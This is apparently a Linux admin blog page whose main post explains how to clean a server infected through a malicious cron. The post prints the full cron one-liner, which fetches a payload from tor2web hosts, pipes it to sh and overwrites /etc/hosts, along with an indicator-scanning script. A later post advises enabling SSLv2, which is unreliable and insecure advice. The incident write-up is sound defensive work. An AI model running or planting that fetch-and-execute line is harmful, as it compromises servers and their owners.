[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux

1. Malicious Processes

A. Identify the suspicious processes and the URL they fetch from; in the case below it is an7kmd2wp4xo7hpr.tor2web.su
B. Use the command ps aux

root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d

2. Malicious Crons

A. Now grep the whole server for the same URL name
B. The command is below
[root@host ~]# grep -rli an7kmd2wp4xo7hpr /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab

[root@host ~]# cat /etc/cron.d/root
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

[root@host ~]# cat /etc/crontab
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
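The grep above only looks for one hostname, but the cron entry itself names three download hosts and also overwrites /etc/hosts. The script below is an added example (not from the original post) that sweeps the usual cron locations for all the indicators visible in that entry and checks whether /etc/hosts has been reduced to the single line the cron writes; the function names and the --run flag are my own.

```shell
#!/bin/sh
# Added example: sweep cron locations for the indicators seen in the
# malicious crontab entry above. Function names are hypothetical.

# Strings taken from the cron entry: the three fetch hosts, the payload
# path and the /etc/hosts entries it checks for before overwriting the file.
IOC_PATTERN='an7kmd2wp4xo7hpr|tor2web\.su|d2web\.org|onion\.sh|timesync\.su|src/ldm'

# scan_cron_iocs PATH... : print every file under PATH that matches an indicator
scan_cron_iocs() {
    grep -rliE "$IOC_PATTERN" "$@" 2>/dev/null
}

# count_cron_iocs PATH... : number of files that matched (usable as an exit code)
count_cron_iocs() {
    scan_cron_iocs "$@" | wc -l | tr -d ' '
}

# hosts_tampered FILE : succeeds if FILE looks like the hosts file the cron
# writes, i.e. exactly one non-blank line reading "127.0.0.1 localhost"
hosts_tampered() {
    [ "$(grep -cv '^[[:space:]]*$' "$1")" -eq 1 ] &&
        grep -qx '127\.0\.0\.1[[:space:]][[:space:]]*localhost' "$1"
}

# Run as root on a real host with --run; without it only the functions are defined.
if [ "${1:-}" = "--run" ]; then
    scan_cron_iocs /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily \
        /etc/cron.weekly /etc/cron.monthly /var/spool/cron
    hosts_tampered /etc/hosts && echo "/etc/hosts has been overwritten"
    exit 0
fi
```

Any file it lists should be reviewed and cleaned (and, as the Solutions section says, protected with chattr +i until the root cause is closed).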


Solutions:-

A. Remove the malicious code from the crons (and from wherever else you find it) and, for the time being, put chattr +i on those files as well
B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab
C.
- Change the root password immediately
- Remove every authorized key that is not yours from all users

ls -lahd /home/*/.ssh/auth*
ls -lahd /root/.ssh/auth*

- ClamAV - Antivirus
- Maldet - Malware Detector
- Restricting SSH from particular IPs/VPN
- Restricting MySQL from particular IPs/VPN
- CSF Firewall
- LFD Login Failure Daemon
- WAF Web Application Firewall
- ModSecurity with HTTP/Apache
- Avoid using the MySQL root user's password in application code; create a non-root MySQL user instead.
- Proper permissions and ownership of code files, e.g. 755 for directories and 644 for files.
- Non standard SSH port


Play VLC Playlist (xspf) with command line CLI – The Big Bang Theory (TBBT)

Hi, by using the command below you can make VLC play a playlist; in my case the playlist tbbt-s6.xspf is placed on the Desktop. It is actually The Big Bang Theory (TBBT).

navdeep@host:~$

/usr/bin/vlc --started-from-file /home/navdeep/Desktop/tbbt-s6.xspf


VLC media player 2.2.2 Weatherwax (revision 2.2.2-0-g6259d80)
[0000000002406148] core libvlc: Running vlc with the default interface. Use ‘cvlc’ to use vlc without interface.

[Solved] Fatal error: Uncaught exception ‘GuzzleHttp\Exception\ConnectException – CURLE_SSL_CONNECT_ERROR 35

Error:-
Fatal error: Uncaught exception ‘GuzzleHttp\Exception\ConnectException’ with message ‘cURL error 35: SSL connect error (see http://curl.haxx.se/libcurl/c/libcurl-errors.html)’

Means:-

CURLE_SSL_CONNECT_ERROR (35)

A problem occurred somewhere in the SSL/TLS handshake. You really want the error buffer and read the message there as it pinpoints the problem slightly more. Could be certificates (file formats, paths, permissions), passwords, and others.

Solutions:-

1. Check if your site supports SSLv2; if not, enable it

navdeep@host:~$ curl --sslv2 https://the-d2.com
curl: (35) GnuTLS does not support SSLv2


2. Check that your site's SSL chain is complete and that it has 4 certs in the chain

https://www.sslshopper.com/ssl-checker.html#hostname=the-d2.com
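The same chain check can be done from the server itself with openssl, which is handy when the Guzzle error comes from a box that cannot reach the online checker. This is an added example, not part of the original post; the helper names (count_pem_certs, verify_status, check_chain) are mine, and the host argument is whatever site Guzzle is failing to connect to.

```shell
#!/bin/sh
# Added example: inspect the certificate chain a server presents and report
# OpenSSL's verdict on it. Helper names are hypothetical.

# count_pem_certs FILE : number of PEM certificate blocks in FILE
count_pem_certs() {
    grep -c 'BEGIN CERTIFICATE' "$1"
}

# verify_status FILE : the "Verify return code" that openssl s_client printed,
# e.g. "0 (ok)" or "21 (unable to verify the first certificate)"
verify_status() {
    sed -n 's/^ *Verify return code: //p' "$1" | head -n 1
}

# check_chain HOST [PORT] : connect with SNI, save the handshake output, then
# report how many certificates the server sent and whether the chain verified.
# A chain that is missing its intermediates shows up as a short chain plus a
# non-zero verify code, which cURL surfaces as error 35.
check_chain() {
    host=$1
    port=${2:-443}
    out=$(mktemp)
    openssl s_client -connect "$host:$port" -servername "$host" -showcerts \
        </dev/null >"$out" 2>/dev/null
    sed -n '/BEGIN CERTIFICATE/,/END CERTIFICATE/p' "$out" > "$out.pem"
    echo "$host: $(count_pem_certs "$out.pem") certificate(s) in presented chain"
    echo "$host: verify result: $(verify_status "$out")"
    rm -f "$out" "$out.pem"
}

# Usage: ./check_chain.sh the-d2.com [443]
if [ -n "${1:-}" ]; then
    check_chain "$1" "${2:-443}"
fi
```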

Move old files on daily basis with find command to keep folder light – Linux/Unix

I'm working as a Linux admin and my daily work includes taking screenshots, so I put full screenshots in the Pictures folder and cropped ones in the Music folder.

I end up with 20 to 30 pictures daily, and a folder with that many files takes time to load, so below are the crons that keep only the past 10 days of files and move the rest into a zold folder inside each of them; /dev/null eats all the errors.

# -maxdepth 1 -type f: only look at files directly in the folder, so zold/ itself
# and the files already moved into it are not matched again on the next run
0 3,15 * * * find Music/ -maxdepth 1 -type f -mtime +10 -exec mv {} Music/zold/ \; 2> /dev/null

0 14,21 * * * find Pictures/ -maxdepth 1 -type f -mtime +10 -exec mv {} Pictures/zold/ \; 2> /dev/null

Install TEAM VIEWER 12 with Shell Script – Ubuntu

#!/bin/bash
# Use this script for Ubuntu only.
# By default this script will install 64bit Teamviewer

echo "============================================"
echo -e "\e[1;32m REMOVING PREVIOUS TEAMVIEWER IF ANY ............ \e[0m"
echo "============================================"
# Remove any 64-bit or 32-bit (i386) TeamViewer left from earlier installs;
# these commands fail harmlessly when nothing is installed.
sudo apt-get remove teamviewer -y
sudo apt autoremove -y
sudo apt-get remove teamviewer:i386 -y
sudo dpkg -r teamviewer:i386
sudo dpkg --purge teamviewer
sudo dpkg --purge teamviewer:i386
sudo apt autoremove -y
rm -fr /tmp/teamviewer*

# Download the 64-bit TeamViewer 12 package and install it
cd /tmp && wget http://download.teamviewer.com/download/version_12x/teamviewer_amd64.deb
sudo dpkg -i /tmp/teamviewer_amd64.deb
# Pull in the dependencies dpkg could not resolve on its own
sudo apt-get install libgcc1 -y
sudo apt-get -f install -y

# Check the package is now registered with dpkg (grep's status decides the branch)
if sudo dpkg -l | grep -i teamviewer; then
    echo "============================================"
    echo -e "\e[1;32m TEAM VIEWER 12 INSTALLED SUCCESSFULLY \e[0m"
    echo "============================================"
else
    echo "============================================"
    echo -e "\e[1;31m TEAM VIEWER 12 INSTALLATION FAILED \e[0m"
    echo "============================================"
fi